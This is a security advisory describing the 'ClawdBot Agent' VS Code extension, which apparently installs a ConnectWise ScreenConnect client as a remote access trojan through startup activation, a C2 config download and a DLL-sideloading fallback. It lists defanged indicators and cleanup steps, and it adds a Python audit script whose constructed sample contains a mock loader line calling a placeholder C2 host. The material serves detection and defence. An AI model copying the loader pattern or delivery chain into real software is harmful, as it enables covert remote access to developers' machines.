Weaponized VS Code Extension “ClawdBot Agent” Spreads ScreenConnect RAT

A malicious Visual Studio Code extension posing as an AI coding assistant has been caught secretly installing a fully functional remote access tool (RAT) on developer machines.

The extension looks convincing at first glance: polished branding, a professional icon, and integration with several AI providers including OpenAI, Anthropic, Google, Ollama, Groq, Mistral, and OpenRouter.

In reality, it was a trojan that weaponized ConnectWise ScreenConnect for stealthy remote control.

The assistant capabilities actually work, which helps the attacker avoid immediate suspicion from users.

On January 27, 2026, a VS Code extension named “ClawdBot Agent” appeared on the Marketplace, pretending to be an official integration for the viral AI assistant Clawdbot.

Under the hood, however, the extension is built to run as soon as VS Code starts. Its package.json specifies:

```json
"activationEvents": ["onStartupFinished"]
```

This ensures the extension activates automatically at startup with no user interaction. The activate() function immediately calls initCore() before any of the “legitimate” AI assistant logic executes.

That initCore() routine contacts a command-and-control (C2) server at http://clawdbot.getintwopc[.]site/config.json, parses a configuration file, and, if enabled, silently downloads and executes additional binaries.

Errors are quietly suppressed in an empty catch block, and a fallback routine kicks in if the primary C2 fails.
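As an added example (not code from the original report or from Aikido), the script below audits installed VS Code extensions for the pattern just described: start-up activation combined with process spawning and a remote fetch or config download in the entry script, with a silent catch as a secondary signal. The `SUSPECT_PATTERNS` heuristics, the `.invalid` C2 hostname and the two sample extensions are constructed for this illustration.

```python
import json
import re
import tempfile
from pathlib import Path

# Heuristic patterns (this example's own, not the original analysts' signatures).
SUSPECT_PATTERNS = {
    "spawns_process": re.compile(r"\bchild_process\b|\bexecFile\(|\bspawn\("),
    "remote_config": re.compile(r"https?://[^\s'\"]+/config\.json"),
    "network_download": re.compile(r"\bhttps?\.get\(|\bfetch\(|\baxios\b"),
    "silent_catch": re.compile(r"catch\s*(\([^)]*\))?\s*\{\s*\}"),
}

def audit_extension(ext_dir: Path) -> dict:
    """Report start-up activation and suspicious code patterns for one extension."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    ext_id = f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}"
    events = manifest.get("activationEvents", [])
    startup = "onStartupFinished" in events or "*" in events
    entry = ext_dir / manifest.get("main", "extension.js")
    source = entry.read_text(encoding="utf-8", errors="replace") if entry.is_file() else ""
    hits = [name for name, rx in SUSPECT_PATTERNS.items() if rx.search(source)]
    # Start-up activation alone is common and benign; flag only its combination
    # with process spawning plus a remote config or download.
    suspicious = startup and "spawns_process" in hits and (
        "remote_config" in hits or "network_download" in hits)
    return {"id": ext_id, "startup_activation": startup, "hits": hits, "suspicious": suspicious}

def audit_all(extensions_root: Path) -> list[dict]:
    """Audit every extension directory under a root such as ~/.vscode/extensions."""
    return [audit_extension(d) for d in sorted(extensions_root.iterdir())
            if (d / "package.json").is_file()]

def build_sample_root() -> Path:
    """Constructed extensions root: one loader-like extension and one benign one."""
    root = Path(tempfile.mkdtemp(prefix="vsix-audit-"))
    samples = {
        "loader-demo": (["onStartupFinished"],
            'const cp = require("child_process");\n'
            'function initCore() { https.get("http://c2.example.invalid/config.json", '
            'r => cp.execFile("Code.exe")); }\n'
            'exports.activate = () => { try { initCore(); } catch (e) {} };\n'),
        "benign-demo": (["onLanguage:python"],
            'exports.activate = () => vscode.window.showInformationMessage("hi");\n'),
    }
    for name, (events, body) in samples.items():
        d = root / f"example.{name}-1.0.0"
        d.mkdir()
        (d / "package.json").write_text(json.dumps({"publisher": "example", "name": name, "main": "extension.js", "activationEvents": events}))
        (d / "extension.js").write_text(body)
    return root
```

Running `audit_all(Path.home() / ".vscode" / "extensions")` on a real machine lists each extension with its hits; `build_sample_root()` only exists so the heuristics can be exercised offline.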

The retrieved config.json lists a set of files that closely resemble a packaged Electron application, including Code.exe, multiple DLLs, and support files. At first glance it looks like a trojanized VS Code build.

Clawdbot (Source: Aikido).

Static and sandbox analysis, however, show that Code.exe is in fact a legitimate ConnectWise ScreenConnect client, flagged by multiple security vendors as a remote administration tool. When run, it installs to:

C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7)

and deploys standard ScreenConnect components such as ScreenConnect.ClientService.exe and ScreenConnect.WindowsBackstageShell.exe. It then connects to:

meeting.bulletmailer[.]net:8041

The abuse lies entirely in the configuration. The embedded ScreenConnect settings hardcode meeting.bulletmailer[.]net as the relay server and include an RSA public key that ties victims directly to the attacker’s infrastructure.

This “Bring Your Own ScreenConnect” approach leverages a trusted remote support tool to bypass many defenses that would typically flag custom RATs.

The attackers also ship a malicious DWrite.dll, detected as a trojanized 64‑bit DLL injector. It is written in Rust, exports the legitimate DWriteCreateFactory symbol, and is designed for DLL sideloading. When loaded, it uses WinINet APIs to download a second-stage payload from a Dropbox URL masquerading as a Zoom update (zoomupdate.msi).

The downloaded MSI shares the same hash as Code.exe, confirming it is the same ScreenConnect installer delivered via a different path.

This makes DWrite.dll a redundant loader: if the primary C2 or delivery path fails, the Dropbox-hosted payload keeps the operation alive.

Additional fallbacks include hardcoded HTTP download URLs and even a PowerShell-based batch script that pulls “Lightshot.exe” from a separate domain, darkgptprivate[.]com.

This multi-layered design (dynamic config, JavaScript fallback, PowerShell script, Dropbox-based loader, DLL sideloading, and a trusted remote support tool) gives the attackers high resilience against takedowns and analysis.

Users who installed the “ClawdBot Agent” extension should act immediately:

  • Remove the “ClawdBot Agent” extension from VS Code.
  • Look for ScreenConnect at
    C:\Program Files (x86)\ScreenConnect Client (083e4d30c7ea44f7) and uninstall it.
  • In Services, stop and remove any “ScreenConnect Client (083e4d30c7ea44f7)” entries.
  • Delete %TEMP%\Lightshot if present.
  • In Task Manager, investigate any unexpected Code.exe or ScreenConnect processes, especially running from temporary or non-standard paths.
  • Block meeting.bulletmailer[.]net, clawdbot.getintwopc[.]site, darkgptprivate[.]com, and associated IPs at the network perimeter; monitor for outbound connections on port 8041.
  • Run a full antivirus scan.
  • Rotate any API keys (OpenAI, Anthropic, Google, etc.) entered into the extension.
  • Review scheduled tasks, startup entries, and persistence mechanisms related to ScreenConnect or suspicious binaries.

Microsoft has now removed the malicious extension from the VS Code Marketplace, but any system where it was installed should be treated as potentially compromised with full remote access granted to the attacker.
